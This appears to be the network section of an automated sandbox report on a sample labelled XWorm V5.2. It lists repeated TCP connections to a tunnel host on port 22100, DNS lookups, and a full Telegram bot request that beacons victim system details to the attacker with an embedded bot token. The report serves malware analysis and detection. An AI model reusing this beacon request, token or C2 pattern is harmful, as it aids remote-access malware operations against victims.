                                                                                                                                                                                                        Feb 7, 2024 03:23:26.883512020 CET4976522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:26.908165932 CET4976522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:27.098839998 CET2210049765167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:27.099091053 CET4976522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:27.123548031 CET2210049765167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:27.314250946 CET2210049765167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:31.948301077 CET4976622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.153444052 CET2210049766167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.153553963 CET4976622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.165406942 CET4976622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.358711004 CET2210049766167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.358825922 CET4976622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.370217085 CET2210049766167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.563851118 CET2210049766167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.246032953 CET4976722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.450133085 CET2210049767167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.450325966 CET4976722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.461704016 CET4976722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.654465914 CET2210049767167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.654654026 CET4976722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.665570021 CET2210049767167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.858510971 CET2210049767167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.558099031 CET4976822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.764597893 CET2210049768167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.764844894 CET4976822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.776726961 CET4976822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.971240044 CET2210049768167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.971329927 CET4976822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.982429028 CET2210049768167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:43.177328110 CET2210049768167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:47.806905031 CET4976922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.010510921 CET2210049769167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.010750055 CET4976922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.026173115 CET4976922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.214940071 CET2210049769167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.215051889 CET4976922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.229533911 CET2210049769167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.418348074 CET2210049769167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.061991930 CET4977022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.273466110 CET2210049770167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.273571014 CET4977022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.285332918 CET4977022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.484829903 CET2210049770167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.484915018 CET4977022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.496141911 CET2210049770167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.696448088 CET2210049770167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.432141066 CET4977122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.642183065 CET2210049771167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.642415047 CET4977122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.683295012 CET4977122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.852344990 CET2210049771167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.852588892 CET4977122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.893049955 CET2210049771167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:59.062669992 CET2210049771167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.020785093 CET4977222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.238436937 CET2210049772167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.238604069 CET4977222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.256424904 CET4977222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.455579042 CET2210049772167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.455733061 CET4977222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.473047972 CET2210049772167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.672543049 CET2210049772167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.294312000 CET4977322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.499277115 CET2210049773167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.499413013 CET4977322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.519639015 CET4977322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.704211950 CET2210049773167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.704340935 CET4977322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.724591970 CET2210049773167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.908778906 CET2210049773167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:14.715858936 CET4977422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:14.933320999 CET2210049774167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:14.933521986 CET4977422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:14.956003904 CET4977422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:15.150609016 CET2210049774167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:15.150784969 CET4977422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:15.173229933 CET2210049774167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:15.369344950 CET2210049774167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:20.151688099 CET4977522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:20.367284060 CET2210049775167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:20.367484093 CET4977522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:20.385023117 CET4977522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:20.582462072 CET2210049775167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:20.582798958 CET4977522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:20.599682093 CET2210049775167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:20.797883987 CET2210049775167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:25.450894117 CET4977622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:25.655558109 CET2210049776167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:25.655703068 CET4977622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:25.676542997 CET4977622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:25.859474897 CET2210049776167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:25.859566927 CET4977622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:25.863043070 CET4977622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:25.867186069 CET4977722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:25.880166054 CET2210049776167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.062972069 CET2210049776167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.066063881 CET2210049776167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.078284025 CET2210049777167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.078577042 CET4977722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.097762108 CET4977722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.289998055 CET2210049777167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.290298939 CET4977722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.290298939 CET4977722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.293422937 CET4977822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.308693886 CET2210049777167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.501405001 CET2210049777167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.501526117 CET2210049777167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.508301020 CET2210049778167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.508554935 CET4977822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.527887106 CET4977822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.723658085 CET2210049778167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.723742962 CET4977822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.723815918 CET4977822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.726285934 CET4977922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.743117094 CET2210049778167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.938664913 CET2210049778167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.938726902 CET2210049778167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.942943096 CET2210049779167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.943123102 CET4977922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:26.965517044 CET4977922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.160152912 CET2210049779167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.160269976 CET4977922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.160459995 CET4977922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.163059950 CET4978022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.182223082 CET2210049779167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.373100042 CET2210049780167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.376636028 CET4978022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.376916885 CET2210049779167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.376955986 CET2210049779167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.423728943 CET4978022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.586683035 CET2210049780167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.588639975 CET4978022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.588639975 CET4978022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.591691017 CET4978122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.633771896 CET2210049780167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.797346115 CET2210049781167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.797461987 CET4978122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.798191071 CET2210049780167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.798230886 CET2210049780167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:27.817962885 CET4978122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:28.002844095 CET2210049781167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:28.002928972 CET4978122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:28.023066998 CET2210049781167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:28.208086014 CET2210049781167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:32.888621092 CET4978222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.098679066 CET2210049782167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.098802090 CET4978222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.113023043 CET4978222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.308402061 CET2210049782167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.308506012 CET4978222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.308557034 CET4978222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.311218023 CET4978322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.322464943 CET2210049782167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.518016100 CET2210049782167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.518073082 CET2210049782167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.519500017 CET2210049783167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.519733906 CET4978322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.538455963 CET4978322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.727030039 CET2210049783167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.727179050 CET4978322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.745414019 CET2210049783167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:33.933948040 CET2210049783167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:38.557946920 CET4978422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:38.761945009 CET2210049784167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:38.762051105 CET4978422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:38.792327881 CET4978422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:38.965673923 CET2210049784167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:38.966006041 CET4978422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:38.995583057 CET2210049784167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:39.169367075 CET2210049784167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:43.949506044 CET4978522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.166595936 CET2210049785167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.166799068 CET4978522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.185626984 CET4978522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.383629084 CET2210049785167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.383749962 CET4978522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.383884907 CET4978522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.385675907 CET4978622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.401992083 CET2210049785167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.589741945 CET2210049786167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.589993954 CET4978622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.600476980 CET2210049785167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.600517988 CET2210049785167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.604473114 CET4978622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.794276953 CET2210049786167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.794462919 CET4978622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.808383942 CET2210049786167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:44.998352051 CET2210049786167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:49.760431051 CET4978722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:49.966068029 CET2210049787167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:49.966500044 CET4978722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:49.988166094 CET4978722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.172069073 CET2210049787167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.172310114 CET4978722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.172311068 CET4978722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.174449921 CET4978822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.193840027 CET2210049787167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.377644062 CET2210049787167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.377671003 CET2210049787167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.389700890 CET2210049788167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.389818907 CET4978822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.405559063 CET4978822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.607496977 CET2210049788167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.607695103 CET4978822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.620173931 CET2210049788167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:50.825635910 CET2210049788167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:55.590267897 CET4978922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:55.802340984 CET2210049789167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:55.802603960 CET4978922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:55.816302061 CET4978922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:56.014252901 CET2210049789167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:56.014326096 CET4978922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:56.028260946 CET2210049789167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:56.225686073 CET2210049789167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:25:00.838618994 CET4979022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:25:01.048176050 CET2210049790167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:25:01.048465967 CET4979022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:25:01.061172962 CET4979022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:25:01.258522987 CET2210049790167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:25:01.258616924 CET4979022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:25:01.270622969 CET2210049790167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:25:01.468153954 CET2210049790167.71.56.116192.168.2.6
                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Feb 7, 2024 03:21:56.824778080 CET5388253192.168.2.61.1.1.1
                                                                                                                                                                                                        Feb 7, 2024 03:21:56.943655968 CET53538821.1.1.1192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.217967987 CET5637453192.168.2.61.1.1.1
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.437144041 CET53563741.1.1.1192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.236150980 CET5021353192.168.2.61.1.1.1
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.395288944 CET53502131.1.1.1192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:03.839309931 CET5672953192.168.2.61.1.1.1
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.019679070 CET53567291.1.1.1192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:25:11.037131071 CET5454653192.168.2.61.1.1.1
                                                                                                                                                                                                        Feb 7, 2024 03:25:11.469223976 CET53545461.1.1.1192.168.2.6
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        Feb 7, 2024 03:21:56.824778080 CET192.168.2.61.1.1.10x1298Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.217967987 CET192.168.2.61.1.1.10xb98eStandard query (0)trusting-smoke-90361.pktriot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.236150980 CET192.168.2.61.1.1.10xbc44Standard query (0)trusting-smoke-90361.pktriot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Feb 7, 2024 03:24:03.839309931 CET192.168.2.61.1.1.10xda06Standard query (0)trusting-smoke-90361.pktriot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Feb 7, 2024 03:25:11.037131071 CET192.168.2.61.1.1.10xbcb6Standard query (0)trusting-smoke-90361.pktriot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        Feb 7, 2024 03:21:56.943655968 CET1.1.1.1192.168.2.60x1298No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.437144041 CET1.1.1.1192.168.2.60xb98eNo error (0)trusting-smoke-90361.pktriot.neteu-central-7075.packetriot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.437144041 CET1.1.1.1192.168.2.60xb98eNo error (0)eu-central-7075.packetriot.net167.71.56.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.395288944 CET1.1.1.1192.168.2.60xbc44No error (0)trusting-smoke-90361.pktriot.neteu-central-7075.packetriot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.395288944 CET1.1.1.1192.168.2.60xbc44No error (0)eu-central-7075.packetriot.net167.71.56.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.019679070 CET1.1.1.1192.168.2.60xda06No error (0)trusting-smoke-90361.pktriot.neteu-central-7075.packetriot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.019679070 CET1.1.1.1192.168.2.60xda06No error (0)eu-central-7075.packetriot.net167.71.56.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Feb 7, 2024 03:25:11.469223976 CET1.1.1.1192.168.2.60xbcb6No error (0)trusting-smoke-90361.pktriot.neteu-central-7075.packetriot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Feb 7, 2024 03:25:11.469223976 CET1.1.1.1192.168.2.60xbcb6No error (0)eu-central-7075.packetriot.net167.71.56.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                        • api.telegram.org
                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.2.649699149.154.167.2204437096C:\Users\user\Desktop\X.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-02-07 02:21:57 UTC451OUTGET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE9633C7A2F2B74FB9C2E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%208ZZ4CZYT%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
                                                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        2024-02-07 02:21:58 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                        Date: Wed, 07 Feb 2024 02:21:57 GMT
                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                        Content-Length: 456
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
